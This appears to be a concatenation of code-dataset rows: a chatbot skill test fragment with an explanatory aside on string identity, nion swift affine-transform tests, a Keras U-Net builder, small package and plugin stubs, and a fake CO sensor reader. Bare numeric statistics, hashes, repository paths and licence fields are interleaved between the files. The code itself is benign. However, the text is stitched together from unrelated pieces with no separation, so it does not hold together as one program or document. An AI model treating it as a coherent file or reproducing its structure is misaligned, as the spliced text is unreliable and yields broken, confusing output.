        result = skill.run(
            message='twenty four', user_id='100500', history=[], state_name=None, context={}
        )
        assert result.answers == ['Are you sure?']
        assert not result.is_relevant
        assert not result.is_finished
        assert result.direct_to == 'execute'  # was `is 'execute'`: string equality, not identity
        assert result.context == {}

        result = skill.run(
            message='24', user_id='100500', history=[], state_name='execute', context=result.context
        )
        assert result.answers == ['You are 24 years old']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

    def test_specify_with_direct_to_callable(self):
        class AgeSkillWithDirectTo(BaseSkill):
            def execute(self, message: str, user_id: str):
                try:
                    age = int(message)
                except ValueError:
                    self.specify(question='Are you sure?', direct_to=self.execute)
                self.say(f'You are {age} years old')

        skill = AgeSkillWithDirectTo()

        result = skill.run(
            message='twenty four', user_id='100500', history=[], state_name=None, context={}
        )
        assert result.answers == ['Are you sure?']
        assert not result.is_relevant
        assert not result.is_finished
        assert result.direct_to == 'execute'  # was `is 'execute'`: string equality, not identity
        assert result.context == {}

        result = skill.run(
            message='24', user_id='100500', history=[], state_name='execute', context=result.context
        )
        assert result.answers == ['You are 24 years old']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

    def test_override_initial_state_name(self):
        class EchoSkill(BaseSkill):
            initial_state_name = 'echo'

            def echo(self, message: str, user_id: str):
                self.say(message)

        skill = EchoSkill()

        result = skill.run(
            message='hello', user_id='100500', history=[], state_name=None, context={}
        )
        assert result.answers == ['hello']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

        result = skill.run(
            message='bye', user_id='100500', history=[], state_name='echo', context=result.context
        )
        assert result.answers == ['bye']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {}

    def test_context_using(self):
        class MeetingSkillWithStates(BaseSkill):
            def execute(self, message: str, user_id: str):
                self.context['greeting'] = 'Nice to meet you'
                self.ask('What is your name?', direct_to=self.meeting)

            def meeting(self, name: str, user_id: str):
                greeting = self.context['greeting']
                self.say(f'{greeting} {name}!')

        skill = MeetingSkillWithStates()

        result = skill.run(
            message='hello', user_id='100500', history=[], state_name=None, context={}
        )
        assert result.answers == ['What is your name?']
        assert result.is_relevant
        assert not result.is_finished
        assert result.direct_to == 'meeting'
        assert result.context == {'greeting': 'Nice to meet you'}

        result = skill.run(
            message='Bob', user_id='100500', history=[], state_name='meeting', context=result.context
        )
        assert result.answers == ['Nice to meet you Bob!']
        assert result.is_relevant
        assert result.is_finished
        assert result.direct_to is None
        assert result.context == {'greeting': 'Nice to meet you'}
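The two assertions rewritten above from `is 'execute'` to `== 'execute'` matter because `is` tests object identity: it only passes for equal strings when CPython happens to intern both operands, and it raises a SyntaxWarning on Python 3.8+. For example:

a = 'execute'
b = ''.join(['exe', 'cute'])
print(a == b)  # True: same contents
print(a is b)  # typically False: distinct objects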
31.765579
103
0.583185
1,204
10,705
5.054817
0.059801
0.187315
0.073612
0.072461
0.942162
0.942162
0.926717
0.926717
0.919816
0.898784
0
0.018623
0.3078
10,705
336
104
31.860119
0.802699
0
0
0.771084
0
0
0.091172
0
0
0
0
0
0.421687
1
0.100402
false
0
0.004016
0.004016
0.156627
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
8
9ba2ce207c603585167de18c4584599d9a70a4e8
202
py
Python
deep_recommenders/keras/models/nlp/__init__.py
LongmaoTeamTf/deep_recommenders
168dabe4ef3a38cc582d019766cf3de576bc8af1
[ "Apache-2.0" ]
143
2021-02-04T11:28:07.000Z
2022-03-28T09:02:00.000Z
deep_recommenders/keras/models/nlp/__init__.py
LongmaoTeamTf/Deep-NLP
168dabe4ef3a38cc582d019766cf3de576bc8af1
[ "Apache-2.0" ]
7
2021-03-04T23:59:31.000Z
2022-01-27T05:13:02.000Z
deep_recommenders/keras/models/nlp/__init__.py
LongmaoTeamTf/deep_recommenders
168dabe4ef3a38cc582d019766cf3de576bc8af1
[ "Apache-2.0" ]
40
2021-02-08T15:26:53.000Z
2022-03-29T08:41:14.000Z
#!/usr/bin/python3
# -*- coding: utf-8 -*-

from deep_recommenders.keras.models.nlp.multi_head_attention import MultiHeadAttention
from deep_recommenders.keras.models.nlp.transformer import Transformer
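The two imports above exist so that the layers are re-exported at the package root; downstream code can then import them in one line (illustrative usage, nothing beyond the re-export is assumed):

from deep_recommenders.keras.models.nlp import MultiHeadAttention, Transformer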
33.666667
86
0.816832
26
202
6.192308
0.692308
0.099379
0.248447
0.310559
0.42236
0.42236
0
0
0
0
0
0.010695
0.074257
202
5
87
40.4
0.850267
0.193069
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
fd4490769ac33da686f0ded5025b281fbe18996a
9,576
py
Python
Tutorial 2 - Data Navigation/PlugIns/experimental/nionswift_plugin/nion_experimental_tools/test/AffineTransformImage_test.py
paradimdata/Cornell_EM_SummerSchool_2021
9f3583e1b85a9cdd86e1b91800027966d501ce96
[ "MIT" ]
8
2021-06-13T20:02:12.000Z
2022-03-24T09:19:23.000Z
Tutorial 2 - Data Navigation/PlugIns/experimental/nionswift_plugin/nion_experimental_tools/test/AffineTransformImage_test.py
paradimdata/Cornell_EM_SummerSchool_2021
9f3583e1b85a9cdd86e1b91800027966d501ce96
[ "MIT" ]
null
null
null
Tutorial 2 - Data Navigation/PlugIns/experimental/nionswift_plugin/nion_experimental_tools/test/AffineTransformImage_test.py
paradimdata/Cornell_EM_SummerSchool_2021
9f3583e1b85a9cdd86e1b91800027966d501ce96
[ "MIT" ]
1
2021-07-16T20:12:28.000Z
2021-07-16T20:12:28.000Z
import gettext
import unittest

import numpy

# local libraries
from nion.swift import Facade
from nion.data import DataAndMetadata
from nion.swift.test import TestContext
from nion.ui import TestUI
from nion.swift import Application
from nion.swift.model import DocumentModel
from nionswift_plugin.nion_experimental_tools import AffineTransformImage

_ = gettext.gettext

Facade.initialize()


def create_memory_profile_context() -> TestContext.MemoryProfileContext:
    return TestContext.MemoryProfileContext()


class TestAffineTransformImage(unittest.TestCase):

    def setUp(self):
        self.app = Application.Application(TestUI.UserInterface(), set_global=True)
        self.app.workspace_dir = str()

    def tearDown(self):
        pass

    def test_affine_transform_image_for_2d_data(self):
        with create_memory_profile_context() as profile_context:
            document_controller = profile_context.create_document_controller_with_application()
            document_model = document_controller.document_model
            data = numpy.zeros((5, 5))
            data[2:-2, 1:-1] = 1
            xdata = DataAndMetadata.new_data_and_metadata(data)
            api = Facade.get_api("~1.0", "~1.0")
            data_item = api.library.create_data_item_from_data_and_metadata(xdata)
            document_controller.selection.set(0)
            document_controller.selected_display_panel = None  # use the document controller selection
            affine_transform = AffineTransformImage.AffineTransformMenuItem(api)
            affine_transform.menu_item_execute(api.application.document_controllers[0])
            document_controller.periodic()
            # Can't convince the computation to update when changing the graphics,
            # so just check that it got executed
            vector_a = data_item.graphics[0]
            vector_b = data_item.graphics[1]
            # Rotate by 90 degrees
            vector_a.end = (0.75, 0.5)
            vector_b.end = (0.5, 0.75)
            # Update computation
            document_controller.periodic()
            DocumentModel.evaluate_data(document_model.computations[0])
            self.assertEqual(len(data_item.graphics), 2)
            self.assertEqual(api.library.data_item_count, 2)
            self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data)))

    def test_affine_transform_image_for_3d_data(self):
        data_descriptors = [DataAndMetadata.DataDescriptor(True, 0, 2),
                            DataAndMetadata.DataDescriptor(False, 1, 2),
                            DataAndMetadata.DataDescriptor(False, 2, 1)]
        for data_descriptor in data_descriptors:
            with self.subTest(data_descriptor=data_descriptor):
                with create_memory_profile_context() as profile_context:
                    document_controller = profile_context.create_document_controller_with_application()
                    document_model = document_controller.document_model
                    data = numpy.zeros((5, 5, 5))
                    if data_descriptor.collection_dimension_count == 2:
                        data[2:-2, 1:-1] = 1
                    else:
                        data[..., 2:-2, 1:-1] = 1
                    xdata = DataAndMetadata.new_data_and_metadata(data, data_descriptor=data_descriptor)
                    api = Facade.get_api("~1.0", "~1.0")
                    data_item = api.library.create_data_item_from_data_and_metadata(xdata)
                    document_controller.selection.set(0)
                    document_controller.selected_display_panel = None  # use the document controller selection
                    affine_transform = AffineTransformImage.AffineTransformMenuItem(api)
                    affine_transform.menu_item_execute(api.application.document_controllers[0])
                    document_controller.periodic()
                    # Can't convince the computation to update when changing the graphics,
                    # so just check that it got executed
                    vector_a = data_item.graphics[0]
                    vector_b = data_item.graphics[1]
                    # Rotate by 90 degrees
                    vector_a.end = (0.75, 0.5)
                    vector_b.end = (0.5, 0.75)
                    # Update computation
                    document_controller.periodic()
                    DocumentModel.evaluate_data(document_model.computations[0])
                    self.assertEqual(len(data_item.graphics), 2)
                    self.assertEqual(api.library.data_item_count, 2)
                    if data_descriptor.collection_dimension_count == 2:
                        self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data)))
                    else:
                        self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data, axes=(1, 2))))

    def test_affine_transform_image_for_4d_data(self):
        data_descriptors = [DataAndMetadata.DataDescriptor(True, 1, 2),
                            DataAndMetadata.DataDescriptor(False, 2, 2),
                            DataAndMetadata.DataDescriptor(True, 2, 1)]
        for data_descriptor in data_descriptors:
            with self.subTest(data_descriptor=data_descriptor):
                with create_memory_profile_context() as profile_context:
                    document_controller = profile_context.create_document_controller_with_application()
                    document_model = document_controller.document_model
                    data = numpy.zeros((5, 5, 5, 5))
                    if data_descriptor.collection_dimension_count == 2 and not data_descriptor.is_sequence:
                        data[2:-2, 1:-1] = 1
                    elif data_descriptor.collection_dimension_count == 2 and data_descriptor.is_sequence:
                        data[:, 2:-2, 1:-1] = 1
                    else:
                        data[..., 2:-2, 1:-1] = 1
                    xdata = DataAndMetadata.new_data_and_metadata(data, data_descriptor=data_descriptor)
                    api = Facade.get_api("~1.0", "~1.0")
                    data_item = api.library.create_data_item_from_data_and_metadata(xdata)
                    document_controller.selection.set(0)
                    document_controller.selected_display_panel = None  # use the document controller selection
                    affine_transform = AffineTransformImage.AffineTransformMenuItem(api)
                    affine_transform.menu_item_execute(api.application.document_controllers[0])
                    document_controller.periodic()
                    # Can't convince the computation to update when changing the graphics,
                    # so just check that it got executed
                    vector_a = data_item.graphics[0]
                    vector_b = data_item.graphics[1]
                    # Rotate by 90 degrees
                    vector_a.end = (0.75, 0.5)
                    vector_b.end = (0.5, 0.75)
                    # Update computation
                    document_controller.periodic()
                    DocumentModel.evaluate_data(document_model.computations[0])
                    self.assertEqual(len(data_item.graphics), 2)
                    self.assertEqual(api.library.data_item_count, 2)
                    if data_descriptor.collection_dimension_count == 2 and not data_descriptor.is_sequence:
                        self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data)))
                    elif data_descriptor.collection_dimension_count == 2 and data_descriptor.is_sequence:
                        self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data, axes=(1, 2))))
                    else:
                        self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data, axes=(2, 3))))

    def test_affine_transform_image_for_5d_data(self):
        data_descriptor = DataAndMetadata.DataDescriptor(True, 2, 2)
        with create_memory_profile_context() as profile_context:
            document_controller = profile_context.create_document_controller_with_application()
            document_model = document_controller.document_model
            data = numpy.zeros((2, 5, 5, 5, 5))
            data[:, 2:-2, 1:-1] = 1
            xdata = DataAndMetadata.new_data_and_metadata(data, data_descriptor=data_descriptor)
            api = Facade.get_api("~1.0", "~1.0")
            data_item = api.library.create_data_item_from_data_and_metadata(xdata)
            document_controller.selection.set(0)
            document_controller.selected_display_panel = None  # use the document controller selection
            affine_transform = AffineTransformImage.AffineTransformMenuItem(api)
            affine_transform.menu_item_execute(api.application.document_controllers[0])
            document_controller.periodic()
            # Can't convince the computation to update when changing the graphics,
            # so just check that it got executed
            vector_a = data_item.graphics[0]
            vector_b = data_item.graphics[1]
            # Rotate by 90 degrees
            vector_a.end = (0.75, 0.5)
            vector_b.end = (0.5, 0.75)
            # Update computation
            document_controller.periodic()
            DocumentModel.evaluate_data(document_model.computations[0])
            self.assertEqual(len(data_item.graphics), 2)
            self.assertEqual(api.library.data_item_count, 2)
            self.assertTrue(numpy.allclose(document_model.data_items[1].data, numpy.rot90(data, axes=(1, 2))))
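A side note on why the expected results switch between numpy.rot90(data), axes=(1, 2), and axes=(2, 3): rot90 only rotates the plane named by `axes` and leaves the remaining sequence/collection axes alone, which is exactly what an affine transform of the datum plane should do. A quick self-contained check of that behavior:

import numpy

stack = numpy.zeros((2, 5, 5))
stack[:, 2:-2, 1:-1] = 1
rotated = numpy.rot90(stack, axes=(1, 2))  # rotate each 5x5 frame; axis 0 untouched
assert rotated.shape == (2, 5, 5)
assert numpy.allclose(rotated[0], numpy.rot90(stack[0]))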
57.341317
125
0.636383
1,077
9,576
5.4039
0.12442
0.098969
0.03299
0.008419
0.874055
0.874055
0.840893
0.821649
0.821649
0.821649
0
0.028185
0.281224
9,576
166
126
57.686747
0.817376
0.078425
0
0.744526
0
0
0.003637
0
0
0
0
0
0.109489
1
0.051095
false
0.007299
0.072993
0.007299
0.138686
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
b5dbc5e6b7db19ae658944e14379748b6bded351
116
py
Python
platform/hwconf_data/efr32bg22/PythonSnippet/__init__.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
null
null
null
platform/hwconf_data/efr32bg22/PythonSnippet/__init__.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
1
2020-08-25T02:36:22.000Z
2020-08-25T02:36:22.000Z
platform/hwconf_data/efr32bg22/PythonSnippet/__init__.py
lenloe1/v2.7
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
[ "Zlib" ]
1
2020-08-25T01:56:04.000Z
2020-08-25T01:56:04.000Z
from efr32bg22.halconfig import halconfig_types as types
from efr32bg22.halconfig import halconfig_dependency as dep
58
59
0.887931
16
116
6.3125
0.5
0.257426
0.435644
0.554455
0.732673
0
0
0
0
0
0
0.07619
0.094828
116
2
59
58
0.885714
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
7
b5e008c51a1e776e0e6b0c5979b8098cd2209636
14,108
py
Python
pomonet/u_nets.py
RobertGebauer/pomo_ccbsc
771553ed874643ec6190dc8b2fc345753fdd26d1
[ "MIT" ]
null
null
null
pomonet/u_nets.py
RobertGebauer/pomo_ccbsc
771553ed874643ec6190dc8b2fc345753fdd26d1
[ "MIT" ]
1
2022-03-13T09:42:18.000Z
2022-03-13T09:42:18.000Z
pomonet/u_nets.py
RobertGebauer/pomo_ccbsc
771553ed874643ec6190dc8b2fc345753fdd26d1
[ "MIT" ]
1
2021-11-23T19:17:45.000Z
2021-11-23T19:17:45.000Z
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 18 07:45:38 2021

@author: Mihai Boldeanu
"""
from tensorflow.keras import regularizers
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Activation, Conv2DTranspose
from tensorflow.keras.layers import Input, BatchNormalization
from tensorflow.keras.layers import Conv2D, MaxPooling2D, UpSampling2D
from tensorflow.keras.layers import add, concatenate


def get_model(img_size, num_classes, first_layer=16):
    inputs = Input(shape=img_size)

    ### [First half of the network: downsampling inputs] ###
    l1_weight = 1e-6 * 16. / first_layer
    l2_weight = 1e-5 * (16. / first_layer) ** 2

    # Entry block
    x = Conv2D(first_layer, 3, strides=2, padding="same", use_bias=False, kernel_initializer='glorot_normal',
               kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(inputs)
    x = BatchNormalization()(x)
    x = Activation("relu")(x)

    previous_block_activation = x  # Set aside residual

    # Blocks 1, 2, 3 are identical apart from the feature depth.
    for filters in [2 * first_layer, 4 * first_layer, 8 * first_layer, 16 * first_layer]:
        x = Activation("relu")(x)
        x = Conv2D(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                   kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = Activation("relu")(x)
        x = Conv2D(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                   kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = MaxPooling2D(3, strides=2, padding="same")(x)

        # Project residual
        residual = Conv2D(filters, 1, strides=2, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                          kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(
            previous_block_activation)
        x = add([x, residual])  # Add back residual
        previous_block_activation = x  # Set aside next residual

    ### [Second half of the network: upsampling inputs] ###
    for filters in [16 * first_layer, 8 * first_layer, 4 * first_layer, 2 * first_layer, first_layer]:
        x = Activation("relu")(x)
        x = Conv2DTranspose(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                            kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = Activation("relu")(x)
        x = Conv2DTranspose(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                            kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = UpSampling2D(2)(x)

        # Project residual
        residual = UpSampling2D(2)(previous_block_activation)
        residual = Conv2D(filters, 1, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                          kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(residual)
        x = add([x, residual])  # Add back residual
        previous_block_activation = x  # Set aside next residual

    # Add a per-pixel classification layer
    outputs = Conv2D(num_classes, 3, activation="softmax", padding="same", kernel_initializer='glorot_normal',
                     kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)

    # Define the model
    model = Model(inputs, outputs)
    return model


def get_model_v2(img_size, num_classes, first_layer=16):
    inputs = Input(shape=img_size)

    ### [First half of the network: downsampling inputs] ###
    l1_weight = 1e-6 * 16. / first_layer
    l2_weight = 1e-5 * (16. / first_layer) ** 2
    previous_block_activations = []

    # Entry block
    x = Conv2D(first_layer, 3, strides=2, padding="same", use_bias=False, kernel_initializer='glorot_normal',
               kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(inputs)
    x = BatchNormalization()(x)
    x = Activation("relu")(x)

    previous_block_activation = x  # Set aside residual
    previous_block_activations.append(x)  # Set aside deep residual

    # Blocks 1, 2, 3 are identical apart from the feature depth.
    for filters in [2 * first_layer, 4 * first_layer, 8 * first_layer, 16 * first_layer]:
        x = Activation("relu")(x)
        x = Conv2D(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                   kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = Activation("relu")(x)
        x = Conv2D(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                   kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = MaxPooling2D(3, strides=2, padding="same")(x)

        # Project residual
        residual = Conv2D(filters, 1, strides=2, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                          kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(
            previous_block_activation)
        previous_block_activations.append(x)
        x = add([x, residual])  # Add back residual
        previous_block_activation = x  # Set aside next residual

    ### [Second half of the network: upsampling inputs] ###
    previous_block_activations.reverse()
    for i, filters in enumerate([16 * first_layer, 8 * first_layer, 4 * first_layer, 2 * first_layer, first_layer]):
        x = Activation("relu")(x)
        x = Conv2DTranspose(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                            kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = Activation("relu")(x)
        x = Conv2DTranspose(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                            kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = UpSampling2D(2)(x)

        # Project residual
        residual = UpSampling2D(2)(previous_block_activation)
        residual = Conv2D(filters, 1, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                          kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(residual)
        x = add([x, residual])  # Add back residual

        deep_residual = UpSampling2D(2)(previous_block_activations[i])
        deep_residual = Conv2D(filters, 1, padding="same", kernel_initializer='glorot_normal',
                               kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(deep_residual)
        x = concatenate([x, deep_residual])  # Add back residual
        previous_block_activation = x  # Set aside next residual

    # Add a per-pixel classification layer
    outputs = Conv2D(num_classes, 3, activation="softmax", padding="same", kernel_initializer='glorot_normal',
                     kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)

    # Define the model
    model = Model(inputs, outputs)
    return model


def get_model_unet(img_size, num_classes, first_layer=16):
    l1_weight = 1e-6 * 16. / first_layer
    l2_weight = 1e-5 * (16. / first_layer) ** 2

    inputs = Input(shape=img_size)

    ### [First half of the network: downsampling inputs] ###
    previous_block_activations = []

    # Entry block
    x = Conv2D(first_layer, 3, strides=2, padding="same", use_bias=False, kernel_initializer='glorot_normal',
               kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(inputs)
    x = BatchNormalization()(x)
    x = Activation("relu")(x)

    previous_block_activations.append(x)  # Set aside residual

    # Blocks 1, 2, 3 are identical apart from the feature depth.
    for filters in [2 * first_layer, 4 * first_layer, 8 * first_layer, 16 * first_layer]:
        x = Activation("relu")(x)
        x = Conv2D(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                   kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = Activation("relu")(x)
        x = Conv2D(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                   kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = MaxPooling2D(3, strides=2, padding="same")(x)

        # # Project residual
        # residual = Conv2D(filters, 1, strides=2, padding="same", kernel_initializer='glorot_normal')(
        #     previous_block_activation)
        # x = concatenate([x, residual])  # Add back residual
        previous_block_activations.append(x)  # Set aside next residual

    ### [Second half of the network: upsampling inputs] ###
    previous_block_activations.reverse()
    for i, filters in enumerate([16 * first_layer, 8 * first_layer, 4 * first_layer, 2 * first_layer, first_layer]):
        x = Activation("relu")(x)
        x = Conv2DTranspose(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                            kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = Activation("relu")(x)
        x = Conv2DTranspose(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal',
                            kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)
        x = BatchNormalization()(x)
        x = UpSampling2D(2)(x)

        # Project residual
        residual = UpSampling2D(2)(previous_block_activations[i])
        residual = Conv2D(filters, 1, padding="same", kernel_initializer='glorot_normal',
                          kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(residual)
        x = concatenate([x, residual])  # Add back residual
        # previous_block_activation = x  # Set aside next residual

    # Add a per-pixel classification layer
    outputs = Conv2D(num_classes, 3, activation="softmax", padding="same", kernel_initializer='glorot_normal',
                     kernel_regularizer=regularizers.l1_l2(l1=l1_weight, l2=l2_weight))(x)

    # Define the model
    model = Model(inputs, outputs)
    return model


def get_model_unet_plus(img_size, num_classes, first_layer=16):
    inputs = Input(shape=img_size)

    ### [First half of the network: downsampling inputs] ###
    previous_block_activations = []

    # Entry block
    x = Conv2D(first_layer, 3, strides=2, padding="same", use_bias=False, kernel_initializer='glorot_normal')(inputs)
    x = BatchNormalization()(x)
    x = Activation("relu")(x)

    # previous_block_activations.append(x)  # Set aside residual
    previous_block_activation = x

    # Blocks 1, 2, 3 are identical apart from the feature depth.
    for filters in [2 * first_layer, 4 * first_layer, 8 * first_layer, 16 * first_layer]:
        x = Activation("relu")(x)
        x = Conv2D(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal')(x)
        x = BatchNormalization()(x)
        x = Activation("relu")(x)
        x = Conv2D(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal')(x)
        x = BatchNormalization()(x)
        x = MaxPooling2D(3, strides=2, padding="same")(x)

        # Project residual
        residual = Conv2D(filters, 1, strides=2, padding="same", kernel_initializer='glorot_normal')(
            previous_block_activation)
        x = add([x, residual])  # Add back residual
        # previous_block_activations.append(x)  # Set aside next residual
        previous_block_activation = x

    ### [Second half of the network: upsampling inputs] ###
    previous_block_activations.reverse()
    for i, filters in enumerate([16 * first_layer, 8 * first_layer, 4 * first_layer, 2 * first_layer, first_layer]):
        x = Activation("relu")(x)
        x = Conv2DTranspose(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal')(x)
        x = BatchNormalization()(x)
        x = Activation("relu")(x)
        x = Conv2DTranspose(filters, 3, padding="same", use_bias=False, kernel_initializer='glorot_normal')(x)
        x = BatchNormalization()(x)
        x = UpSampling2D(2)(x)

        # Project residual
        # residual = UpSampling2D(2)(previous_block_activations[i])
        # residual = Conv2D(filters, 1, padding="same", kernel_initializer='glorot_normal')(residual)
        # x = concatenate([x, residual])  # Add back residual
        # previous_block_activation = x  # Set aside next residual
        residual = UpSampling2D(2)(previous_block_activation)
        residual = Conv2D(filters, 1, padding="same", kernel_initializer='glorot_normal')(residual)
        x = add([x, residual])  # Add back residual
        previous_block_activation = x  # Set aside next residual

    # Add a per-pixel classification layer
    output_1 = Conv2D(num_classes, 3, activation="softmax", padding="same", name="class_segmentation")(x)
    output = Conv2D(20, 3, activation="relu", padding="same")(output_1)
    output = Conv2D(20, 3, activation="relu", padding="same")(output)
    output_2 = Conv2D(1, 3, activation="sigmoid", padding="same", name="instance_segmentation")(output)

    # Define the model
    model = Model(inputs, [output_1, output_2])
    return model
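A usage sketch for the builders above. The 256x256x3 input and 4 classes are invented for illustration; any spatial size that survives the one stride-2 entry convolution, four poolings, and five upsamplings cleanly (e.g. powers of two) behaves the same way:

# Illustrative only: img_size and num_classes are assumptions, not from the source.
model = get_model(img_size=(256, 256, 3), num_classes=4, first_layer=16)
model.compile(optimizer="adam", loss="categorical_crossentropy")
model.summary()  # 256x256 input -> 8x8 bottleneck -> per-pixel softmax at 256x256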
45.656958
115
0.643536
1,715
14,108
5.093878
0.067055
0.012134
0.086882
0.109547
0.952038
0.930288
0.925366
0.916781
0.907166
0.895375
0
0.035427
0.241707
14,108
309
116
45.656958
0.781174
0.148426
0
0.870647
0
0
0.060598
0.001765
0
0
0
0
0
1
0.019901
false
0
0.029851
0
0.069652
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
bd37cc002a138ff9901ff30c859c06288229dff9
98
py
Python
LRE/plugins/test/plugin.py
MashowJ/Latte
32f3cac8198015d71d16b5b718c84039be8b5feb
[ "MIT" ]
1
2018-01-13T14:58:07.000Z
2018-01-13T14:58:07.000Z
LRE/plugins/test/plugin.py
AlinadoOrg/Latte
32f3cac8198015d71d16b5b718c84039be8b5feb
[ "MIT" ]
null
null
null
LRE/plugins/test/plugin.py
AlinadoOrg/Latte
32f3cac8198015d71d16b5b718c84039be8b5feb
[ "MIT" ]
null
null
null
#!/usr/bin/env python
# -*- coding: utf-8 -*-


def init():
    pass


def servers():
    return {}
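Loader-side sketch of the plugin contract (hypothetical; only the two hooks above come from the plugin itself, and the import path is illustrative):

import importlib

plugin = importlib.import_module("plugins.test.plugin")  # path is an assumption
plugin.init()                  # one-time setup hook (a no-op here)
assert plugin.servers() == {}  # empty server registry for this test plugin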
10.888889
23
0.530612
13
98
4
0.923077
0
0
0
0
0
0
0
0
0
0
0.013514
0.244898
98
8
24
12.25
0.689189
0.428571
0
0
0
0
0
0
0
0
0
0
0
1
0.5
true
0.25
0
0.25
0.75
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
1
0
1
1
0
0
7
1fbb3a9e2d93a1a84cb0d7cc949780bcdd3fceb5
140
py
Python
pi/envirobox.py
CarbonDock/CarbonDock
9c94158798cd5be2890eb3e1d51b20fbdc576995
[ "MIT" ]
null
null
null
pi/envirobox.py
CarbonDock/CarbonDock
9c94158798cd5be2890eb3e1d51b20fbdc576995
[ "MIT" ]
null
null
null
pi/envirobox.py
CarbonDock/CarbonDock
9c94158798cd5be2890eb3e1d51b20fbdc576995
[ "MIT" ]
2
2019-11-09T17:52:46.000Z
2019-11-10T15:31:00.000Z
from time import time
from math import sin


def get_values():
    # normally get sensor data here
    return dict(co=100 * sin(time() * 0.2) + 100)
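Since get_values() synthesizes co as 100 * sin(t) + 100, every reading is bounded; a quick check of the fake sensor:

reading = get_values()
assert 0.0 <= reading["co"] <= 200.0  # 100*sin(t) + 100 always lies in [0, 200]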
